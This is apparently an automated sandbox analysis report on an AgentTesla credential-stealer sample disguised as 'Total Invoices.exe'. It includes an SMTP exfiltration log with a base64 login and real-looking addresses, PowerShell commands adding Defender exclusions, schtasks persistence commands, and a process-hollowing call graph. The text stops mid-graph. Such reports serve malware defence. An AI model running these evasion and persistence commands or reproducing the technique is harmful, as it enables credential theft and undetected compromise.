                                                                                      Apr 24, 2024 03:17:05.663299084 CEST49735587192.168.2.4192.185.129.60MAIL FROM:<design@unitechautomations.com>
                                                                                      Apr 24, 2024 03:17:05.846681118 CEST58749735192.185.129.60192.168.2.4250 OK
                                                                                      Apr 24, 2024 03:17:05.847342014 CEST49735587192.168.2.4192.185.129.60RCPT TO:<overseas1@vestalshipping.com.vn>
                                                                                      Apr 24, 2024 03:17:06.144768000 CEST58749735192.185.129.60192.168.2.4250 Accepted
                                                                                      Apr 24, 2024 03:17:06.144891024 CEST49735587192.168.2.4192.185.129.60DATA
                                                                                      Apr 24, 2024 03:17:06.326395035 CEST58749735192.185.129.60192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                                      Apr 24, 2024 03:17:06.326885939 CEST49735587192.168.2.4192.185.129.60.
                                                                                      Apr 24, 2024 03:17:06.510248899 CEST58749735192.185.129.60192.168.2.4250 OK id=1rzRFy-003iLo-0l
                                                                                      Apr 24, 2024 03:17:13.774615049 CEST58749736192.185.129.60192.168.2.4220-cp-ht-2.webhostbox.net ESMTP Exim 4.96.2 #2 Wed, 24 Apr 2024 06:47:13 +0530
                                                                                      220-We do not authorize the use of this system to transport unsolicited,
                                                                                      220 and/or bulk e-mail.
                                                                                      Apr 24, 2024 03:17:13.774859905 CEST49736587192.168.2.4192.185.129.60EHLO 405464
                                                                                      Apr 24, 2024 03:17:13.956281900 CEST58749736192.185.129.60192.168.2.4250-cp-ht-2.webhostbox.net Hello 405464 [154.16.105.36]
                                                                                      250-SIZE 52428800
                                                                                      250-8BITMIME
                                                                                      250-PIPELINING
                                                                                      250-PIPECONNECT
                                                                                      250-AUTH PLAIN LOGIN
                                                                                      250-STARTTLS
                                                                                      250 HELP
                                                                                      Apr 24, 2024 03:17:13.956635952 CEST49736587192.168.2.4192.185.129.60AUTH login ZGVzaWduQHVuaXRlY2hhdXRvbWF0aW9ucy5jb20=
                                                                                      Apr 24, 2024 03:17:14.139702082 CEST58749736192.185.129.60192.168.2.4334 UGFzc3dvcmQ6
                                                                                      Apr 24, 2024 03:17:14.334096909 CEST58749736192.185.129.60192.168.2.4235 Authentication succeeded
                                                                                      Apr 24, 2024 03:17:14.334405899 CEST49736587192.168.2.4192.185.129.60MAIL FROM:<design@unitechautomations.com>
                                                                                      Apr 24, 2024 03:17:14.516678095 CEST58749736192.185.129.60192.168.2.4250 OK
                                                                                      Apr 24, 2024 03:17:14.516953945 CEST49736587192.168.2.4192.185.129.60RCPT TO:<overseas1@vestalshipping.com.vn>
                                                                                      Apr 24, 2024 03:17:14.770986080 CEST58749736192.185.129.60192.168.2.4250 Accepted
                                                                                      Apr 24, 2024 03:17:14.771238089 CEST49736587192.168.2.4192.185.129.60DATA
                                                                                      Apr 24, 2024 03:17:14.961005926 CEST58749736192.185.129.60192.168.2.4354 Enter message, ending with "." on a line by itself
                                                                                      Apr 24, 2024 03:17:14.975688934 CEST49736587192.168.2.4192.185.129.60.
                                                                                      Apr 24, 2024 03:17:15.163530111 CEST58749736192.185.129.60192.168.2.4250 OK id=1rzRG6-003iSC-2o
                                                                                      Apr 24, 2024 03:18:53.470197916 CEST49736587192.168.2.4192.185.129.60QUIT
                                                                                      Apr 24, 2024 03:18:53.854284048 CEST58749736192.185.129.60192.168.2.4221 cp-ht-2.webhostbox.net closing connection

                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:03:16:54
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\user\Desktop\Total Invoices.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\Total Invoices.exe"
                                                                                      Imagebase:0xba0000
                                                                                      File size:807'936 bytes
                                                                                      MD5 hash:CD3C05EBB9A3FCA7AA748F522559B1EA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1732168754.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1732168754.0000000004EBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:03:17:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Total Invoices.exe"
                                                                                      Imagebase:0x920000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:03:17:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:03:17:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dWXyZYb.exe"
                                                                                      Imagebase:0x920000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:03:17:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:03:17:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp3C54.tmp"
                                                                                      Imagebase:0x490000
                                                                                      File size:187'904 bytes
                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:03:17:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:03:17:01
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                      Imagebase:0xd60000
                                                                                      File size:45'984 bytes
                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1802303133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1804990629.00000000030BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1804990629.00000000030B2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1804990629.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1804990629.0000000003061000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:9
                                                                                      Start time:03:17:02
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\dWXyZYb.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\user\AppData\Roaming\dWXyZYb.exe
                                                                                      Imagebase:0xb10000
                                                                                      File size:807'936 bytes
                                                                                      MD5 hash:CD3C05EBB9A3FCA7AA748F522559B1EA
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1833905348.000000000401A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1833905348.000000000401A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 61%, ReversingLabs
                                                                                      • Detection: 32%, Virustotal, Browse
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:10
                                                                                      Start time:03:17:03
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                      Imagebase:0x7ff693ab0000
                                                                                      File size:496'640 bytes
                                                                                      MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:11
                                                                                      Start time:03:17:11
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dWXyZYb" /XML "C:\Users\user\AppData\Local\Temp\tmp5BB3.tmp"
                                                                                      Imagebase:0x490000
                                                                                      File size:187'904 bytes
                                                                                      MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:12
                                                                                      Start time:03:17:11
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:13
                                                                                      Start time:03:17:11
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                      Imagebase:0x530000
                                                                                      File size:45'984 bytes
                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2882242292.0000000002891000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2882242292.0000000002899000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000D.00000002.2882242292.000000000282C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000D.00000002.2882242292.000000000282C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:15
                                                                                      Start time:03:17:13
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                                                                                      Imagebase:0x7b0000
                                                                                      File size:45'984 bytes
                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 0%, ReversingLabs
                                                                                      • Detection: 0%, Virustotal, Browse
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:16
                                                                                      Start time:03:17:13
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:19
                                                                                      Start time:03:17:21
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                                                                                      Imagebase:0xb10000
                                                                                      File size:45'984 bytes
                                                                                      MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:20
                                                                                      Start time:03:17:21
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:10.6%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:212
                                                                                        Total number of Limit Nodes:16
                                                                                        execution_graph 29484 de42720 29485 de428ab 29484->29485 29486 de42746 29484->29486 29486->29485 29489 de42999 PostMessageW 29486->29489 29491 de429a0 PostMessageW 29486->29491 29490 de42a0c 29489->29490 29490->29486 29492 de42a0c 29491->29492 29492->29486 29527 7ade398 29531 de41488 29527->29531 29537 de41498 29527->29537 29528 7ade3a7 29532 de414ad 29531->29532 29543 de414d8 29532->29543 29561 de414c8 29532->29561 29579 de4153e 29532->29579 29533 de414bf 29533->29528 29538 de414ad 29537->29538 29540 de4153e 12 API calls 29538->29540 29541 de414c8 12 API calls 29538->29541 29542 de414d8 12 API calls 29538->29542 29539 de414bf 29539->29528 29540->29539 29541->29539 29542->29539 29544 de414f2 29543->29544 29598 de41b67 29544->29598 29602 de4193b 29544->29602 29607 de41bf9 29544->29607 29611 de41eb9 29544->29611 29616 de419b3 29544->29616 29620 de41db3 29544->29620 29625 de42212 29544->29625 29632 de420eb 29544->29632 29637 de41b09 29544->29637 29642 de41c29 29544->29642 29651 de41a6f 29544->29651 29656 de41aee 29544->29656 29661 de41a23 29544->29661 29666 de41be3 29544->29666 29671 de41ba0 29544->29671 29545 de414fa 29545->29533 29562 de414f2 29561->29562 29564 de41b67 2 API calls 29562->29564 29565 de41ba0 2 API calls 29562->29565 29566 de41be3 2 API calls 29562->29566 29567 de41a23 2 API calls 29562->29567 29568 de41aee 2 API calls 29562->29568 29569 de41a6f 2 API calls 29562->29569 29570 de41c29 4 API calls 29562->29570 29571 de41b09 2 API calls 29562->29571 29572 de420eb 2 API calls 29562->29572 29573 de42212 4 API calls 29562->29573 29574 de41db3 2 API calls 29562->29574 29575 de419b3 2 API calls 29562->29575 29576 de41eb9 2 API calls 29562->29576 29577 de41bf9 2 API calls 29562->29577 29578 de4193b 2 API calls 29562->29578 29563 de414fa 29563->29533 29564->29563 29565->29563 29566->29563 29567->29563 29568->29563 29569->29563 29570->29563 29571->29563 29572->29563 29573->29563 29574->29563 29575->29563 29576->29563 29577->29563 29578->29563 29580 de414cc 29579->29580 29582 de41541 29579->29582 29583 de41b67 2 API calls 29580->29583 29584 de41ba0 2 API calls 29580->29584 29585 de41be3 2 API calls 29580->29585 29586 de41a23 2 API calls 29580->29586 29587 de41aee 2 API calls 29580->29587 29588 de41a6f 2 API calls 29580->29588 29589 de41c29 4 API calls 29580->29589 29590 de41b09 2 API calls 29580->29590 29591 de420eb 2 API calls 29580->29591 29592 de42212 4 API calls 29580->29592 29593 de41db3 2 API calls 29580->29593 29594 de419b3 2 API calls 29580->29594 29595 de41eb9 2 API calls 29580->29595 29596 de41bf9 2 API calls 29580->29596 29597 de4193b 2 API calls 29580->29597 29581 de414fa 29581->29533 29582->29533 29583->29581 29584->29581 29585->29581 29586->29581 29587->29581 29588->29581 29589->29581 29590->29581 29591->29581 29592->29581 29593->29581 29594->29581 29595->29581 29596->29581 29597->29581 29675 7add578 29598->29675 29679 7add570 29598->29679 29599 de41b08 29599->29545 29603 de4194d 29602->29603 29604 de419ee 29603->29604 29684 7adddc4 29603->29684 29688 7adddd0 29603->29688 29604->29545 29692 7adda88 29607->29692 29696 7adda80 29607->29696 29608 de41c17 29612 de421e6 29611->29612 29613 de41de8 29612->29613 29700 7addb48 29612->29700 29704 7addb40 29612->29704 29613->29545 29618 7adddc4 CreateProcessA 29616->29618 29619 7adddd0 CreateProcessA 29616->29619 29617 de419ee 29617->29545 29618->29617 29619->29617 29621 de41a19 29620->29621 29621->29545 29621->29620 29622 de41ccf 29621->29622 29623 7addb48 WriteProcessMemory 29621->29623 29624 7addb40 WriteProcessMemory 29621->29624 29622->29545 29623->29621 29624->29621 29708 7addc38 29625->29708 29712 7addc31 29625->29712 29626 de41a19 29626->29545 29627 de41ccf 29626->29627 29630 7addb48 WriteProcessMemory 29626->29630 29631 7addb40 WriteProcessMemory 29626->29631 29627->29545 29630->29626 29631->29626 29633 de41a19 29632->29633 29633->29545 29634 de41ccf 29633->29634 29635 7addb48 WriteProcessMemory 29633->29635 29636 7addb40 WriteProcessMemory 29633->29636 29634->29545 29635->29633 29636->29633 29638 de41b32 29637->29638 29716 7add4c8 29638->29716 29720 7add4c0 29638->29720 29639 de41b47 29639->29545 29643 de41c36 29642->29643 29645 de41b1b 29642->29645 29647 7add578 Wow64SetThreadContext 29643->29647 29648 7add570 Wow64SetThreadContext 29643->29648 29644 de41f30 29644->29545 29645->29644 29649 7add4c8 ResumeThread 29645->29649 29650 7add4c0 ResumeThread 29645->29650 29646 de41b47 29646->29545 29646->29646 29647->29646 29648->29646 29649->29646 29650->29646 29652 de41b32 29651->29652 29654 7add4c8 ResumeThread 29652->29654 29655 7add4c0 ResumeThread 29652->29655 29653 de41b47 29653->29545 29653->29653 29654->29653 29655->29653 29657 de41a19 29656->29657 29657->29545 29658 de41ccf 29657->29658 29659 7addb48 WriteProcessMemory 29657->29659 29660 7addb40 WriteProcessMemory 29657->29660 29658->29545 29659->29657 29660->29657 29662 de41a19 29661->29662 29662->29545 29663 de41ccf 29662->29663 29664 7addb48 WriteProcessMemory 29662->29664 29665 7addb40 WriteProcessMemory 29662->29665 29663->29545 29664->29662 29665->29662 29667 de41a19 29666->29667 29667->29545 29668 de41ccf 29667->29668 29669 7addb48 WriteProcessMemory 29667->29669 29670 7addb40 WriteProcessMemory 29667->29670 29668->29545 29669->29667 29670->29667 29673 7addb48 WriteProcessMemory 29671->29673 29674 7addb40 WriteProcessMemory 29671->29674 29672 de41bc4 29672->29545 29673->29672 29674->29672 29676 7add5bd Wow64SetThreadContext 29675->29676 29678 7add605 29676->29678 29678->29599 29680 7add564 29679->29680 29681 7add576 Wow64SetThreadContext 29679->29681 29680->29599 29683 7add605 29681->29683 29683->29599 29685 7adde59 CreateProcessA 29684->29685 29687 7ade01b 29685->29687 29687->29687 29689 7adde59 CreateProcessA 29688->29689 29691 7ade01b 29689->29691 29693 7addac8 VirtualAllocEx 29692->29693 29695 7addb05 29693->29695 29695->29608 29697 7addac8 VirtualAllocEx 29696->29697 29699 7addb05 29697->29699 29699->29608 29701 7addb90 WriteProcessMemory 29700->29701 29703 7addbe7 29701->29703 29703->29612 29705 7addb90 WriteProcessMemory 29704->29705 29707 7addbe7 29705->29707 29707->29612 29709 7addc83 ReadProcessMemory 29708->29709 29711 7addcc7 29709->29711 29711->29626 29713 7addc83 ReadProcessMemory 29712->29713 29715 7addcc7 29713->29715 29715->29626 29717 7add508 ResumeThread 29716->29717 29719 7add539 29717->29719 29719->29639 29721 7add508 ResumeThread 29720->29721 29723 7add539 29721->29723 29723->29639 29724 15e4668 29725 15e467a 29724->29725 29726 15e4686 29725->29726 29728 15e4779 29725->29728 29729 15e479d 29728->29729 29733 15e4888 29729->29733 29737 15e4879 29729->29737 29735 15e48af 29733->29735 29734 15e498c 29734->29734 29735->29734 29741 15e44b4 29735->29741 29738 15e48af 29737->29738 29739 15e498c 29738->29739 29740 15e44b4 CreateActCtxA 29738->29740 29739->29739 29740->29739 29742 15e5918 CreateActCtxA 29741->29742 29744 15e59db 29742->29744 29493 15eacd0 29497 15eadc8 29493->29497 29505 15eadb7 29493->29505 29494 15eacdf 29498 15eadd9 29497->29498 29500 15eadfc 29497->29500 29498->29500 29513 15eb051 29498->29513 29517 15eb060 29498->29517 29499 15eadf4 29499->29500 29501 15eb000 GetModuleHandleW 29499->29501 29500->29494 29502 15eb02d 29501->29502 29502->29494 29506 15eadd9 29505->29506 29507 15eadfc 29505->29507 29506->29507 29511 15eb060 LoadLibraryExW 29506->29511 29512 15eb051 LoadLibraryExW 29506->29512 29507->29494 29508 15eadf4 29508->29507 29509 15eb000 GetModuleHandleW 29508->29509 29510 15eb02d 29509->29510 29510->29494 29511->29508 29512->29508 29514 15eb060 29513->29514 29515 15eb099 29514->29515 29521 15ea150 29514->29521 29515->29499 29518 15eb074 29517->29518 29519 15eb099 29518->29519 29520 15ea150 LoadLibraryExW 29518->29520 29519->29499 29520->29519 29522 15eb240 LoadLibraryExW 29521->29522 29524 15eb2b9 29522->29524 29524->29515 29525 15ed6b0 DuplicateHandle 29526 15ed746 29525->29526 29745 15ed060 29746 15ed0a6 GetCurrentProcess 29745->29746 29748 15ed0f8 GetCurrentThread 29746->29748 29749 15ed0f1 29746->29749 29750 15ed12e 29748->29750 29751 15ed135 GetCurrentProcess 29748->29751 29749->29748 29750->29751 29752 15ed16b 29751->29752 29753 15ed193 GetCurrentThreadId 29752->29753 29754 15ed1c4 29753->29754

                                                                                        Executed Functions

                                                                                        Function 0DE438A0 Relevance: 9.4, Strings: 7, Instructions: 604COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 294 de438a0-de438c2 295 de43c72-de43c77 294->295 296 de438c8-de43903 call de43594 call de435a4 294->296 297 de43c81-de43c84 295->297 298 de43c79-de43c7b 295->298 307 de43905-de4390f 296->307 308 de43916-de43936 296->308 300 de43c8c-de43c94 297->300 298->297 302 de43c9a-de43ca1 300->302 307->308 310 de43938-de43942 308->310 311 de43949-de43969 308->311 310->311 313 de4397c-de4399c 311->313 314 de4396b-de43975 311->314 316 de4399e-de439a8 313->316 317 de439af-de439b8 call de435b4 313->317 314->313 316->317 320 de439dc-de439e5 call de435c4 317->320 321 de439ba-de439d5 call de435b4 317->321 326 de439e7-de43a02 call de435c4 320->326 327 de43a09-de43a12 call de435d4 320->327 321->320 326->327 333 de43a14-de43a18 call de435e4 327->333 334 de43a1d-de43a39 327->334 333->334 338 de43a51-de43a55 334->338 339 de43a3b-de43a41 334->339 340 de43a57-de43a68 call de435f4 338->340 341 de43a6f-de43ab7 338->341 342 de43a45-de43a47 339->342 343 de43a43 339->343 340->341 349 de43ab9 341->349 350 de43adb-de43ae2 341->350 342->338 343->338 353 de43abc-de43ac2 349->353 351 de43ae4-de43af3 350->351 352 de43af9-de43b07 call de43604 350->352 351->352 362 de43b11-de43b3b call de43614 352->362 363 de43b09-de43b0b 352->363 355 de43ca2-de43ce1 353->355 356 de43ac8-de43ace 353->356 364 de43d40-de43d50 355->364 365 de43ce3-de43d04 355->365 357 de43ad0-de43ad2 356->357 358 de43ad8-de43ad9 356->358 357->358 358->350 358->353 376 de43b3d-de43b4b 362->376 377 de43b68-de43b84 362->377 363->362 371 de43f26-de43f2d 364->371 372 de43d56-de43d60 364->372 365->364 370 de43d06-de43d0c 365->370 378 de43d0e-de43d10 370->378 379 de43d1a-de43d1f 370->379 380 de43f3c-de43f4f 371->380 381 de43f2f-de43f35 371->381 374 de43d62-de43d69 372->374 375 de43d6a-de43d74 372->375 382 de43f59-de43fdc 375->382 383 de43d7a-de43dba 375->383 376->377 390 de43b4d-de43b61 376->390 392 de43b86-de43b90 377->392 393 de43b97-de43bbe call de43624 377->393 378->379 384 de43d21-de43d25 379->384 385 de43d2c-de43d39 379->385 381->380 441 de43fe7-de43fe9 call de43758 382->441 442 de43fde-de43fe2 call de43748 382->442 410 de43dd2-de43dd6 383->410 411 de43dbc-de43dc2 383->411 384->385 385->364 390->377 392->393 402 de43bd6-de43bda 393->402 403 de43bc0-de43bc6 393->403 406 de43bf5-de43c11 402->406 407 de43bdc-de43bee 402->407 404 de43bc8 403->404 405 de43bca-de43bcc 403->405 404->402 405->402 420 de43c13-de43c19 406->420 421 de43c29-de43c2d 406->421 407->406 414 de43e03-de43e1b call de43738 410->414 415 de43dd8-de43dfd 410->415 412 de43dc4 411->412 413 de43dc6-de43dc8 411->413 412->410 413->410 432 de43e1d-de43e22 414->432 433 de43e28-de43e30 414->433 415->414 426 de43c1d-de43c1f 420->426 427 de43c1b 420->427 421->302 422 de43c2f-de43c3d 421->422 434 de43c4f-de43c53 422->434 435 de43c3f-de43c4d 422->435 426->421 427->421 432->433 436 de43e46-de43e65 433->436 437 de43e32-de43e40 433->437 440 de43c59-de43c71 434->440 435->434 435->440 448 de43e67-de43e6d 436->448 449 de43e7d-de43e81 436->449 437->436 447 de43fee-de43ffa call de43cb8 441->447 442->441 452 de43e71-de43e73 448->452 453 de43e6f 448->453 454 de43e83-de43e90 449->454 455 de43eda-de43f23 449->455 452->449 453->449 460 de43ec6-de43ed3 454->460 461 